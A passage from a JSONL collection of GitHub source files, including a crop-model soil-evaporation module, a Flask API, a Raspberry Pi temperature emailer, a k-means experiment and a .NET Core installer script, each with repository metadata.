self.var.nLat, self.var.nLon))\n arr_zeros = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n dz = self.var.dz[None,:,None,None] * arr_ones[:,None,:,:]\n dzsum = self.var.dzsum[None,:,None,None] * arr_ones[:,None,:,:]\n\n # Determine fraction of compartments covered by evaporation layer\n evapzmin_comp = self.var.EvapZmin[:,None,:,:] * np.ones((self.var.nComp))[None,:,None,None]\n comp_sto = (np.round((dzsum - dz) * 1000) < np.round(evapzmin_comp * 1000))\n factor = 1 - ((dzsum - evapzmin_comp) / dz)\n factor = np.clip(factor, 0, 1) * comp_sto\n\n comp_sto = np.sum(comp_sto, axis=1)\n comp = 0\n while np.any((comp < comp_sto) & (ToExtractStg > 0) & (ToExtract > 0)):\n\n cond101 = ((comp < comp_sto) & (ToExtractStg > 0) & (ToExtract > 0))\n\n # Water available in compartment for extraction (mm)\n Wdry = 1000 * self.var.th_dry_comp[:,comp,...] * dz[:,comp,...] \n W = 1000 * self.var.th[:,comp,...] * dz[:,comp,...]\n AvW = np.copy(arr_zeros)\n AvW[cond101] = ((W - Wdry) * factor[:,comp,...])[cond101]\n AvW = np.clip(AvW, 0, None)\n\n # Determine amount by which to adjust variables\n cond1011 = (cond101 & (AvW >= ToExtractStg))\n self.var.EsAct[cond1011] += ToExtractStg[cond1011]\n W[cond1011] -= ToExtractStg[cond1011]\n ToExtract[cond1011] -= ToExtractStg[cond1011]\n ToExtractStg[cond1011] = 0\n\n cond1012 = (cond101 & np.logical_not(cond1011))\n self.var.EsAct[cond1012] += AvW[cond1012]\n W[cond1012] -= AvW[cond1012]\n ToExtract[cond1012] -= AvW[cond1012]\n ToExtractStg[cond1012] -= AvW[cond1012]\n\n # Update water content\n self.var.th[:,comp,...][cond101] = (W / (1000 * dz[:,comp,...]))[cond101]\n comp += 1\n\n def relative_depletion(self):\n\n # Get current water storage\n self.evap_layer_water_content()\n\n # Get water storage (mm) at start of stage 2 evaporation\n Wupper = (self.var.Wstage2 * (self.var.Wevap_Sat - (self.var.Wevap_Fc - self.var.REW)) + (self.var.Wevap_Fc - self.var.REW))\n # Get water storage (mm) when there is no evaporation\n Wlower = np.copy(self.var.Wevap_Dry)\n # Get relative depletion of evaporation storage in stage 2\n Wrel_divd = (self.var.Wevap_Act - Wlower)\n Wrel_divs = (Wupper - Wlower)\n Wrel = np.divide(Wrel_divd, Wrel_divs, out=np.zeros_like(Wrel_divs), where=Wrel_divs!=0)\n return Wrel, Wlower, Wupper \n \n def dynamic(self):\n \n # Add crop dimension to self.var.vars\n et0 = self.var.referencePotET[None,:,:] * np.ones((self.var.nCrop))[:,None,None]\n prec = self.var.precipitation[None,:,:] * np.ones((self.var.nCrop))[:,None,None]\n\n # Prepare stage 2 evaporation (REW gone), if day one of simulation\n cond1 = (self.var._modelTime.timeStepPCR == 1)\n if self.var._modelTime.timeStepPCR == 1:\n self.var.Wsurf.fill(0)\n self.var.EvapZ = np.copy(self.var.EvapZmin)\n self.var.Wstage2 = self.prepare_stage_two_evaporation()\n \n # Prepare soil evaporation stage 1 - adjust water in surface evaporation\n # layer for any infiltration (only do this if rainfall occurs or when\n # irrigation is triggered)\n cond2 = ((prec > 0) | np.any(((self.var.Irr > 0) & (self.var.IrrMethod != 4)), axis=0))\n cond21 = (cond2 & (self.var.Infl > 0))\n self.var.Wsurf[cond21] = self.var.Infl[cond21]\n self.var.Wsurf[cond21] = np.clip(self.var.Wsurf, None, self.var.REW)[cond21]\n self.var.Wstage2[cond21] = 0 # TODO: is this right?\n self.var.EvapZ[cond21] = self.var.EvapZmin[cond21]\n self.var.Stage2[cond21] = False\n\n # Calculate potential soil evaporation rate (mm/day)\n if self.var.CalendarType == 1:\n tAdj = (self.var.DAP - self.var.DelayedCDs) # * growing_season_index\n elif self.var.CalendarType == 2:\n tAdj = (self.var.GDDcum - self.var.DelayedGDDs) # * growing_season_index\n\n EsPot = self.potential_soil_evaporation_rate(tAdj)\n \n # Adjust potential soil evaporation for mulches and/or partial wetting\n EsPotMul = np.copy(EsPot)\n cond1 = (self.var.SurfaceStorage < 0.000001)\n cond11 = (cond1 & (self.var.Mulches == 1))\n cond111 = (cond11 & self.var.GrowingSeasonIndex)\n EsPotMul[cond111] = (EsPot * (1 - self.var.fMulch * (self.var.MulchPctGS / 100)))[cond111]\n cond112 = (cond11 & np.logical_not(self.var.GrowingSeasonIndex))\n EsPotMul[cond112] = (EsPot * (1 - self.var.fMulch * (self.var.MulchPctOS / 100)))[cond112]\n\n # Partial surface wetting by irrigation\n EsPotIrr = np.copy(EsPot)\n cond1 = ((self.var.Irr > 0) & (self.var.IrrMethod != 4))\n cond11 = (cond1 & ((prec > 0) | (self.var.SurfaceStorage > 0)))\n EsPotIrr[cond11] = EsPot[cond11]\n cond12 = (cond1 & np.logical_not(cond11))\n EsPotIrr[cond12] = (EsPot * (self.var.WetSurf / 100))[cond12] # TODO: more informative name for wet_surf\n # return EsPotIrr\n\n # Assign minimum value (mulches and partial wetting don't combine)\n EsPot = np.minimum(EsPotIrr, EsPotMul)\n\n # Initialise actual evaporation counter\n self.var.EsAct = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n\n # Surface evaporation \n # EsActSurf = surface_evaporation(self.var.SurfaceStorage, EsPot)\n EsActSurf = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n cond9 = (self.var.SurfaceStorage > 0)\n cond91 = (cond9 & (self.var.SurfaceStorage > EsPot))\n EsActSurf[cond91] = EsPot[cond91]\n self.var.SurfaceStorage[cond91] -= EsActSurf[cond91]\n cond92 = (cond9 & np.logical_not(cond91))\n EsActSurf[cond92] = self.var.SurfaceStorage[cond92] \n \n self.var.EsAct += EsActSurf\n cond = ((self.var.SurfaceStorage > 0) & (self.var.SurfaceStorage <= EsPot))\n self.var.SurfaceStorage -= EsActSurf\n self.var.Wsurf[cond] = self.var.REW[cond]\n self.var.Wstage2[cond] = 0\n self.var.EvapZ[cond] = self.var.EvapZmin[cond]\n \n # Stage 1 evaporation\n dz = self.var.dz[None,:,None,None] * np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))[:,None,:,:]\n dzsum = self.var.dzsum[None,:,None,None] * np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))[:,None,:,:]\n\n # Determine total water to be extracted\n # print EsPot[0,0,0]\n # print self.var.EsAct[0,0,0]\n ToExtract = EsPot - self.var.EsAct\n # print ToExtract[0,0,0]\n\n # Determine total water to be extracted in stage one (limited by\n # surface layer water storage)\n ExtractPotStg1 = np.minimum(ToExtract, self.var.Wsurf)\n\n # Extract water\n cond10 = (ExtractPotStg1 > 0)\n self.extract_water(ToExtract, ExtractPotStg1)\n \n # Update surface evaporation layer water balance\n self.var.Wsurf[cond10] -= self.var.EsAct[cond10]\n cond102 = (cond10 & ((self.var.Wsurf < 0) | (ExtractPotStg1 > 0.0001)))\n self.var.Wsurf[cond102] = 0\n\n # If surface storage completely depleted, prepare stage 2 evaporation\n cond103 = (cond10 & (self.var.Wsurf < 0.0001))\n Wstage2_tmp = self.prepare_stage_two_evaporation()\n self.var.Wstage2[cond103] = Wstage2_tmp[cond103] # TODO: add MASK argument to function?\n \n # Stage 2 evaporation\n # self.var.th, self.var.EsAct = soil_evaporation_stage_two(\n # self.var.th,\n # self.var.th_s_comp,\n # self.var.th_fc_comp,\n # self.var.th_wp_comp,\n # self.var.th_dry_comp,\n # EsPot,\n # self.var.EsAct,\n # self.var.dz,\n # self.var.dzsum,\n # self.var.EvapZmin,\n # self.var.EvapZmax,\n # self.var.REW,\n # self.var.EvapZ,\n # self.var.fWrelExp,\n # self.var.fevap,\n # self.var.Wstage2,\n # ToExtract,\n # EvapTimeSteps=20)\n\n # print ToExtract[0,0,0]\n # print self.var.EvapZmax[0,0,0]\n # print self.var.EvapZmin[0,0,0]\n # print self.var.EvapZ[0,0,0]\n # print self.var.fevap[0,0,0]\n # print self.var.fWrelExp[0,0,0]\n\n # Extract water\n EvapTimeSteps = 20\n cond11 = (ToExtract > 0) \n if np.any(cond11):\n Edt = ToExtract / EvapTimeSteps\n # Loop sub-daily time steps\n for jj in range(EvapTimeSteps):\n\n # Get water storage (mm) at start of stage 2 evaporation\n Wrel, Wlower, Wupper = self.relative_depletion()\n\n # Check if need to expand evaporative layer\n cond111 = (cond11 & (self.var.EvapZmax > self.var.EvapZmin))\n Wcheck = (self.var.fWrelExp * ((self.var.EvapZmax - self.var.EvapZ) / (self.var.EvapZmax - self.var.EvapZmin)))\n while np.any(cond111 & (Wrel < Wcheck) & (self.var.EvapZ < self.var.EvapZmax)):\n cond1111 = (cond111 & (Wrel < Wcheck) & (self.var.EvapZ < self.var.EvapZmax))\n\n # Expand evaporation layer by 1mm\n self.var.EvapZ[cond1111] += 0.001\n\n # Recalculate current water storage for new EvapZ\n Wrel, Wlower, Wupper = self.relative_depletion()\n Wcheck = (self.var.fWrelExp * ((self.var.EvapZmax - self.var.EvapZ) / (self.var.EvapZmax - self.var.EvapZmin)))\n\n # Get stage 2 evaporation reduction coefficient\n Kr = ((np.exp(self.var.fevap * Wrel) - 1) / (np.exp(self.var.fevap) - 1))\n Kr = np.clip(Kr, None, 1)\n\n # Get water to extract (NB Edt is zero in cells which do not\n # need stage 2, so no need for index)\n # print '********'\n # print self.var.Wevap_Act[0,0,0]\n # print self.var.Wevap_Sat[0,0,0]\n # print self.var.Wevap_Fc[0,0,0]\n # print self.var.Wevap_Dry[0,0,0]\n # print self.var.Wstage2[0,0,0]\n # print Wrel[0,0,0]\n # print Kr[0,0,0]\n # print Edt[0,0,0]\n ToExtractStg2 = (Kr * Edt)\n # print ToExtractStg2[0,0,0]\n self.extract_water(ToExtract, ToExtractStg2)\n # print self.var.th[0,0,0,0]\n # thnew, EsAct, ToExtract, ToExtractStg2 = extract_water(\n # thnew, th_dry, dz, dzsum, EvapZmin, EsAct, ToExtract, ToExtractStg2)\n\n # print self.var.th[0,0,0,0]\n # return thnew, EsAct\n\n # Store potential evaporation for irrigation calculations on next day\n self.var.Epot = np.copy(EsPot)\n\n # print self.var.th[0,0,0,0]\n","repo_name":"Carlitosh/AquaCrop_Py","sub_path":"SoilEvaporation.py","file_name":"SoilEvaporation.py","file_ext":"py","file_size_in_byte":16902,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"26703937374","text":"from glua.balancer.models import Files,Filetrack,Filetrackday,Mirror,Mirrorbw\r\nfrom django.contrib import admin\r\n\r\nclass FileTrackAdmin(admin.ModelAdmin):\r\n #pass\r\n list_display = ('file','year','month','dls','bandwidth')\r\n list_filter = ('year','month','file')\r\n\r\nclass FileTrackDayAdmin(admin.ModelAdmin):\r\n #pass\r\n list_display = ('file','year','month','day','dls','bandwidth')\r\n list_filter = ('year','month','day','file')\r\n\r\nclass MirrorAdmin(admin.ModelAdmin):\r\n list_display = ('name','enabled','bwlimit','description')\r\n list_filter = ('enabled','bwlimit')\r\n\r\nclass MirrorBwAdmin(admin.ModelAdmin):\r\n list_display = ('mirror','year','month','totalbw')\r\n list_filter = ('mirror','month','year',)\r\n ordering = ('-year','month',)\r\n\r\nadmin.site.register(Files)\r\nadmin.site.register(Filetrack,FileTrackAdmin)\r\nadmin.site.register(Filetrackday,FileTrackDayAdmin)\r\nadmin.site.register(Mirror,MirrorAdmin)\r\nadmin.site.register(Mirrorbw,MirrorBwAdmin)","repo_name":"gmorell/Glua.net-SVN-Packager","sub_path":"balancer/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36116274090","text":"'''1) Procure quem foi a pessoa que mais gastou?'''\n\nimport csv\nfrom functions import read_data, convert_to_dicionary \n\nfilename = 'compras.csv'\n\n#leitura de Arquivo\n\ndata = read_data(filename)\n\nregister = len(data)\n\n#transformação dos registros para dicionario (convertendo valores)\n \ninfo = convert_to_dicionary(data)\n \n#processamento\n\nbiggest_purchase = -1\n\nindex_biggest_purchase = 0\n\nheader = data[0]\n\nfor index, line in enumerate(info):\n if line['compra'] > biggest_purchase:\n biggest_purchase = line['compra']\n index_biggest_purchase = index\n \nperson = info[index_biggest_purchase]\n \n#saída de dados \n \nprint(f'\\n{\" MAIOR COMPRA \":=^30}\\n\\n{\".\"*30}\\n\\nNome: {person[\"nome\"]} {person[\"sobrenome\"]}\\n\\nValor da Compra: R$ {person[\"compra\"]:,.2f}\\n\\n{\".\"*30}\\n\\n{\"=\"*30}\\n')\n\n\n\n \n\n ","repo_name":"MarcusPauloFaustino1/Exercicios-Growdev","sub_path":"semana05_aula01/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39092369224","text":"#!/usr/bin/env/python3\nimport RPi.GPIO as GPIO\nimport time, datetime\nimport Adafruit_DHT\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.image import MIMEImage\nfrom template import *\n\n\ngmail_sender = ''\ngmail_passwd = ''\n\nserver = smtplib.SMTP('smtp.gmail.com', 587)\nserver.ehlo()\nserver.starttls()\nserver.ehlo()\nserver.login(gmail_sender, gmail_passwd)\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(21,GPIO.OUT)\nGPIO.output(21,GPIO.HIGH)\n\ndef Rounding():\n try:\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.AM2302, 4)\n temperature = round(temperature,2)\n humidity = round(humidity,2)\n except:\n pass\n return temperature, humidity\n\n'''\ntemp <26: ext-krzysztof.heigel@here.com\ntemp >26: ext-krzysztof.heigel@here.com\ntemp >32: ext-krzysztof.heigel@here.com\n'''\n\ndef EmailSend(TEXT, SUBJECT, recipients, temp):\n server.set_debuglevel(1)\n message = MIMEMultipart('related')\n message.attach(MIMEText(TEXT, 'html'))\n img = '1.jpg'\n if (temp<26):\n img = '1.jpg'\n elif (temp>=26 and temp<32):\n img = '2.jpg'\n elif (temp>=32):\n img = '3.jpg'\n \n with open(img, 'rb') as image_file:\n image = MIMEImage(image_file.read())\n image.add_header('Content-ID', '')\n image.add_header('Content-Disposition', 'inline', filename=img)\n message.attach(image)\n \n message['Subject'] = SUBJECT\n message['From'] = gmail_sender\n message['To'] = \", \".join(recipients)\n server.sendmail(gmail_sender, recipients, message.as_string())\n \nwhile True:\n temperature,humidity = Rounding()\n recipients = ['ext-krzysztof.heigel@here.com']\n EmailSend(TEXTOK.format(temperature), SUBJECTOK, recipients, temperature)\n while temperature<26:\n temperature,humidity = Rounding()\n #time.sleep(30)\n print(\"Temperature: {}C below 26 Humidity: {}% Date and Time: {}\".format(temperature, humidity, datetime.datetime.now()))\n if temperature>=26:\n recipients = ['ext-krzysztof.heigel@here.com']\n EmailSend(TEXT26.format(temperature), SUBJECT26, recipients, temperature)\n while temperature>=26 and temperature<32:\n temperature,humidity = Rounding()\n #time.sleep(30)\n print(\"Temperature: {}C below 32 Humidity: {}% Date and Time: {}\".format(temperature, humidity, datetime.datetime.now()))\n if temperature>=32:\n recipients = ['ext-krzysztof.heigel@here.com']\n EmailSend(TEXT32.format(temperature), SUBJECT32, recipients, temperature)\n \n \n \n \n \n \n","repo_name":"kfheigel/Temperature-Sensor","sub_path":"temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3728617690","text":"#!/usr/bin/env python3\n\n# Standard library imports\n\n# Remote library imports\nfrom flask import request, Flask, jsonify, make_response\nfrom flask_migrate import Migrate\nfrom flask_restful import Resource, Api\n# Local imports\nfrom config import app, db, api\nfrom models import User, Trait, TraitAssociation, Goblin, Date, Dialogue, Response, Outcome\n# Add your model imports\n# Views go here!\n\n@app.route('/')\ndef index():\n return '

Phase 4 Project Server

'\n\nclass Users(Resource):\n \n def get(self):\n users = [user.to_dict(rules=('-traits','-trait_associations')) for user in User.query.all()]\n return make_response(jsonify(users), 200)\n \n def post(self):\n data = request.get_json(force=True)\n try:\n \n new_user = User(**data)\n db.session.add(new_user)\n db.session.commit()\n return make_response(jsonify(new_user.to_dict(rules=('-traits',))), 201)\n \n except ValueError as e:\n return make_response(jsonify({'error': str(e)}), 400)\n \napi.add_resource(Users, '/users') \n\nclass UsersById(Resource):\n \n def get(self, id):\n user = User.query.filter_by(id=id).first()\n if not user:\n return make_response(jsonify({'error': 'User not found'}), 404)\n return make_response(jsonify(user.to_dict()), 200)\n \n def patch(self, id):\n data = request.get_json(force=True)\n try:\n user = User.query.filter_by(id=data['id']).first()\n for key, value in data.items():\n setattr(user, key, value)\n db.session.commit()\n return make_response(jsonify(user.to_dict(rules=('-traits',))), 200)\n \n except ValueError as e:\n return make_response(jsonify({'error': str(e)}), 400)\n \n def delete(self, id):\n data = request.get_json(force=True)\n try:\n user = User.query.filter_by(id=data['id']).first()\n db.session.delete(user)\n db.session.commit()\n return make_response(jsonify(user.to_dict(rules=('-traits',))), 200)\n \n except ValueError as e:\n return make_response(jsonify({'error': str(e)}), 400)\napi.add_resource(UsersById, '/users/') \n\nclass Traits(Resource):\n def get(self):\n traits = [trait.to_dict(rules=('-users', '-dialogues', '-trait_associations')) for trait in Trait.query.all()]\n return make_response(jsonify(traits), 200)\napi.add_resource(Traits, '/traits') \n\n \nclass TraitAssociations(Resource):\n def get(self):\n user_id = request.args.get('user_id')\n if user_id:\n trait_associations = [trait_association.to_dict(rules=('-users', '-traits')) for trait_association in TraitAssociation.query.filter_by(user_id=user_id).all()]\n return make_response(jsonify(trait_associations), 200)\n else:\n trait_associations = [trait_association.to_dict(rules=('-users', '-traits')) for trait_association in TraitAssociation.query.all()]\n return make_response(jsonify(trait_associations), 200)\n def post(self):\n data = request.get_json(force=True)\n try:\n new_trait_association = TraitAssociation(**data)\n db.session.add(new_trait_association)\n db.session.commit()\n return make_response(jsonify(new_trait_association.to_dict(rules=('-users', '-traits'))), 201)\n \n except ValueError as e:\n return make_response(jsonify({'error': str(e)}), 400)\napi.add_resource(TraitAssociations, '/trait_associations')\n\nclass Goblins(Resource):\n \n def get(self):\n goblins = [goblin.to_dict(rules=('-responses', '-outcomes')) for goblin in Goblin.query.all()]\n return make_response(jsonify(goblins), 200)\napi.add_resource(Goblins, '/goblins') \n\nclass Dates(Resource):\n \n def get(self):\n dates = [date.to_dict(rules=('-dialogues', '-outcomes')) for date in Date.query.all()]\n return make_response(jsonify(dates), 200) \napi.add_resource(Dates, '/dates')\n\nclass Dialogues(Resource):\n def get(self):\n dialogues = [dialogue.to_dict() for dialogue in Dialogue.query.all()]\n return make_response(jsonify(dialogues), 200)\napi.add_resource(Dialogues, '/dialogues')\n\nclass Responses(Resource):\n def get(self):\n responses = [response.to_dict(rules=('-outcomes',)) for response in Response.query.all()]\n return make_response(jsonify(responses), 200)\napi.add_resource(Responses, '/responses')\n\nclass Outcomes(Resource):\n def get(self):\n outcome_dicts = [outcome.to_dict() for outcome in Outcome.query.all()]\n return make_response(jsonify(outcome_dicts), 200)\napi.add_resource(Outcomes, '/outcomes')\n\nif __name__ == '__main__':\n app.run(port=5555, debug=True)","repo_name":"elisemcclain/GoblinLove","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14182823788","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 02 08:11:32 2017\n\n@author: Smau2\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.cluster import k_means\nfrom sklearn.metrics import adjusted_mutual_info_score, mutual_info_score, normalized_mutual_info_score\n\ndef kMeans_accuracy(dist):\n num_samples = 100\n #fig = plt.figure()\n #ax = fig.add_subplot(211)\n X,y = make_blobs(n_samples=num_samples, centers=[[0,0],[dist,0]], n_features=2)\n #colors = ['red','blue','green']\n #for i in range(len(X)):\n # ax.scatter(X[i][0],X[i][1],color=colors[y[i]])\n centroid, labels, intertia, iterations = k_means(n_clusters=2,X=X,return_n_iter=True)\n correct = 0;\n score = (normalized_mutual_info_score(y,labels))\n for i in range(len(X)):\n if labels[i] == y[i]:\n correct = correct + 1\n correct = max(correct, num_samples-correct)\n return [correct/float(num_samples),iterations,score]\n #ax = fig.add_subplot(212)\n #for i in range(len(X)):\n # ax.scatter(X[i][0],X[i][1],color=colors[labels[i]])\n\ndistances = [(x/2.0) for x in reversed(range(21))]\nprint(distances)\naccuracy = []\nstd_acc = []\nmi_score = []\nstd_mi_score = []\niterations = []\nstd_iterations = []\n\ntrials_acc = []\ntrials_iter = []\ntrials_mi = []\n\n\n\nfor dist in distances:\n for i in range(0,100):\n kMeans_trial = kMeans_accuracy(dist)\n trials_acc.append(kMeans_trial[0])\n trials_iter.append(kMeans_trial[1])\n trials_mi.append(kMeans_trial[2])\n accuracy.append(np.average(trials_acc))\n std_acc.append(np.std(trials_acc))\n iterations.append(np.average(trials_iter))\n std_iterations.append(np.std(trials_iter))\n mi_score.append(np.average(trials_mi))\n std_mi_score.append(np.std(trials_mi))\n trials_acc = []\n trials_iter = []\n trials_mi = []\n\nplt.errorbar(distances,mi_score,std_mi_score,fmt='o', capsize=5)\n\n\n","repo_name":"Smau4/kMeans","sub_path":"overlap.py","file_name":"overlap.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72129343111","text":"from neuron import h\n#h.nrnmpi_init()\npc = h.ParallelContext()\n\nid = int(pc.id())\nnhost = int(pc.nhost())\n\nprint ('I am %d of %d'%(id, nhost))\n\npc.barrier()\nh.quit()\n","repo_name":"pkuzyc/DeepDendrite","sub_path":"src/nrn_modify/src/parallel/test0.py","file_name":"test0.py","file_ext":"py","file_size_in_byte":166,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"27"} +{"seq_id":"5473047814","text":"# mirkobrombin \n# ------------------------------\n# Install .NET Core on Solus OS\n# License: MIT\n\n\nimport os\nimport re\nimport pathlib\nimport shutil\nimport tarfile\nimport urllib.request\nimport sys\n\nDOTNET_REPO_URL = \"https://dotnet.microsoft.com\"\nDOTNET_REPO_INDEX = f\"{DOTNET_REPO_URL}/download/dotnet\"\nDOTNET_STORE_DIR = f\"{pathlib.Path.home()}/.netcore\"\nDOTNET_STORE_TEMP_DIR = f\"{pathlib.Path.home()}/.netcore/temp\"\n\n\nclass DotNetModel:\n def __init__(self, version, url):\n self.version = version\n self.url = url\n\n\nclass DotNetManager:\n def __init__(self):\n self.versions = list(self.__fetch_versions())\n self.__check_installation()\n self.__check_dir()\n self.__start_ui()\n\n @staticmethod\n def __check_installation():\n dotnet_path = shutil.which(\"dotnet\")\n if dotnet_path is not None:\n print(\"dotnet is already installed\")\n\n @staticmethod\n def __check_dir():\n if not os.path.isdir(DOTNET_STORE_DIR):\n os.mkdir(DOTNET_STORE_DIR)\n if not os.path.isdir(DOTNET_STORE_TEMP_DIR):\n os.mkdir(DOTNET_STORE_TEMP_DIR)\n\n def __start_ui(self):\n self.__menu_title(\".NET Core Manager\")\n self.__select_version()\n self.__select_package()\n self.__install_package()\n\n def __select_version(self):\n self.__menu_title(\"Select version:\")\n for i, version in enumerate(self.versions):\n print(f\"{i}. {version.version}\")\n\n try:\n selection = int(input(\"Select version: \"))\n if selection < 0 or selection > len(self.versions):\n raise ValueError\n self.__selected_version = self.versions[selection]\n except ValueError:\n print(\"Invalid input\")\n self.__select_version()\n\n def __select_package(self):\n self.__menu_title(\"Select package:\")\n print(\"1. SDK\")\n print(\"2. Runtime\")\n print(\"0. Exit\")\n\n try:\n selection = int(input(\"Select package: \"))\n if selection < 0 or selection > 2:\n raise ValueError\n elif selection == 1:\n self.__selected_package = \"sdk\"\n elif selection == 2:\n self.__selected_package = \"runtime\"\n else:\n exit()\n except ValueError:\n print(\"Invalid input\")\n self.__select_package()\n\n def __install_package(self):\n package_path = f\"{DOTNET_STORE_TEMP_DIR}/{self.__selected_version.version}-{self.__selected_package}.tar.gz\"\n install_path = f\"{DOTNET_STORE_DIR}/{self.__selected_version.version}-{self.__selected_package}\".replace(\n \" \", \"-\")\n\n print(\"\\n\")\n print(\"Downloading package...\")\n print(\"Please wait...\")\n url = self.__get_package_url()\n urllib.request.urlretrieve(url, package_path, reporthook=self.__download_progress)\n\n print(\"\\n\")\n print(\"Extracting package...\")\n print(\"Please wait...\")\n with tarfile.open(package_path) as tar:\n def is_within_directory(directory, target):\n \n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n \n prefix = os.path.commonprefix([abs_directory, abs_target])\n \n return prefix == abs_directory\n \n def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n \n for member in tar.getmembers():\n member_path = os.path.join(path, member.name)\n if not is_within_directory(path, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n \n tar.extractall(path, members, numeric_owner=numeric_owner) \n \n \n safe_extract(tar, install_path)\n os.remove(package_path)\n\n print(\"\\n\")\n print(\"Installing...\")\n print(\"Please wait...\")\n os.symlink(f\"{install_path}/dotnet\",\n f\"{pathlib.Path.home()}/.local/bin/dotnet\")\n\n print(\"\\n\")\n print(\"Testing dotnet binary...\")\n print(\"Please wait...\")\n test = shutil.which(\"dotnet\")\n if test is None:\n print(\"dotnet binary not in PATH, adding...\")\n path = \"PATH=$PATH:~/.local/bin\"\n with open(f\"{pathlib.Path.home()}/.profile\", \"a\") as f:\n f.write(f\"export {path}\")\n if os.environ[\"SHELL\"] == \"/bin/bash\":\n with open(f\"{pathlib.Path.home()}/.bashrc\", \"a\") as f:\n f.write(f\"export {path}\")\n elif os.environ[\"SHELL\"] == \"/bin/zsh\":\n with open(f\"{pathlib.Path.home()}/.zshrc\", \"a\") as f:\n f.write(f\"export {path}\")\n\n print(\"\\n\")\n print(\"Installation complete\")\n print(\"Please restart your terminal\")\n exit()\n\n def __download_progress(self, count, block_size, total_size):\n percent = int(count * block_size * 100 / total_size)\n bar = \"■\" * int(percent / 2) + \"□\" * (50 - int(percent / 2))\n sys.stdout.write(f\"\\r{bar} {percent}%\")\n sys.stdout.flush()\n if percent == 100:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n def __get_package_url(self):\n url = f\"{DOTNET_REPO_URL}{self.__selected_version.url}\"\n with urllib.request.urlopen(url) as r:\n source = r.read().decode(\"utf-8\")\n\n if self.__selected_package == \"sdk\":\n pattern = re.compile(\n r\"]*aria-labelledby=\\\"download-release-sdk-[^\\\"]*\\\"[^>]*>(.*?)\", re.DOTALL)\n content = pattern.findall(source)[0]\n pattern = r\"]*href=\\\"/download/dotnet/thank-you/sdk-(.*?)-linux-x64-binaries*\\\"[^>]*>.*?\"\n url = re.compile(pattern).findall(content)[0]\n url = f\"{DOTNET_REPO_URL}/download/dotnet/thank-you/sdk-{url}-linux-x64-binaries\"\n\n elif self.__selected_package == \"runtime\":\n pattern = re.compile(\n r\"]*aria-labelledby=\\\"download-release-runtime-desktop-[^\\\"]*\\\"[^>]*>(.*?)\", re.DOTALL)\n content = pattern.findall(source)[0]\n pattern = r\"]*href=\\\"/download/dotnet/thank-you/runtime-(.*?)-linux-x64-binaries*\\\"[^>]*>.*?\"\n url = re.compile(pattern).findall(content)[0]\n url = f\"{DOTNET_REPO_URL}/download/dotnet/thank-you/runtime-{url}-linux-x64-binaries\"\n\n with urllib.request.urlopen(url) as r:\n source = r.read().decode(\"utf-8\")\n pattern = re.compile(\n r\"]*id=\\\"directLink\\\"[^>]*href=\\\"(.*?)\\\"[^>]*>.*?\", re.DOTALL)\n direct_link = pattern.findall(source)[0]\n return direct_link\n\n @staticmethod\n def __fetch_versions():\n with urllib.request.urlopen(DOTNET_REPO_INDEX) as r:\n source = r.read().decode(\"utf8\")\n pattern = re.compile(r\"(.*?)\", re.DOTALL)\n content = pattern.findall(source)[0]\n\n pattern = re.compile(\n r\"(.*?)\", re.DOTALL)\n links = pattern.findall(content)\n\n for l in links:\n yield DotNetModel(l[1], l[0])\n\n return []\n\n @staticmethod\n def __menu_title(title):\n print(\"\\n\")\n print(f\"\\33[1m\\33[30m{title}\\033[0m\")\n print(\"-\" * len(title))\n\ndn_manager = DotNetManager()\n","repo_name":"mirkobrombin/BetterCallSolus","sub_path":"netcore.py","file_name":"netcore.py","file_ext":"py","file_size_in_byte":7653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"33731279744","text":"import asyncio\nimport logging\nimport zmq\nfrom typing import List, Tuple\nimport time\nimport redis\nimport random\nimport logging\nfrom request import load_targets_config, get_new_list_default, get_moment_listings\nfrom loggers import setup_logging_pre\nimport subprocess\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_target_number(old_list, new_list=None, target_price: float = 1) -> List[Tuple[str, float, float]]:\n if new_list is None:\n filter_by_price_single = filter(lambda n: float(\n n['moment']['price']) <= target_price, old_list)\n return list(map(lambda n: (n['moment']['flowSerialNumber'], target_price, float(n['moment']['price'])), filter_by_price_single))\n\n filter_listings = filter(\n lambda n: n['id'] not in map(lambda j: j['id'], old_list),\n new_list\n )\n filter_by_price = filter(lambda n: float(\n n['moment']['price']) <= target_price, filter_listings)\n return list(map(lambda n: (n['moment']['flowSerialNumber'], target_price, float(n['moment']['price'])), filter_by_price))\n\n\nasync def process(set_id, play_id, sn_targets, floor_price, socket, redis_client):\n # TODO 改为绝对数值\n # TODO 